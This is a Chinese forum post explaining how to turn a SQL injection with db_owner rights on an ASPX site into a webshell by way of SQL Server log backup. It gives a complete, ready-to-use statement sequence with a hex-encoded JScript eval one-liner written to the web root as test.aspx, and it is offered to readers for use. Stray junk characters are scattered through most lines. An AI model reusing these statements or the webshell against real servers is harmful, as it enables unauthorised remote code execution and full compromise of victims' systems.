最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
3 A3 Y- U6 @4 T- B% n. A6 p* p但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。+ n- G+ K+ a8 @9 T
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。: a2 \3 l& ]5 _% k
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。+ N9 x3 F7 m4 K* w. H, g6 B
+ s9 x' e9 {+ J4 G2 o/ o--------------------------------------------------------------% z1 D3 f: s- b
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
, B- J& o+ f1 k自己修改备份语句如下:
$ E9 k& i& R1 u$ [Drop table cmd;--2 S/ F& G+ j4 O5 W
alter database db_test set RECOVERY FULL;--5 C) e# \8 ~ {9 N+ W2 S/ m
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
' w6 b0 q$ o! u" t- ubackup log db_test to disk = 'c:\bak' with init;--1 F' `% l# p. D
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
3 e3 o7 |3 b& A M, Vdelete from cmd where id>1;--删除id>1的数据: C& G; l5 T" h% P: k( l+ `, M
backup log db_test to disk = 'e:\webroot\test.aspx';--
1 l# [: {2 ~( f7 w8 p6 p/ f% ?Drop table cmd;--) i' \7 Y$ l2 J; V9 O
希望对大家有用。 |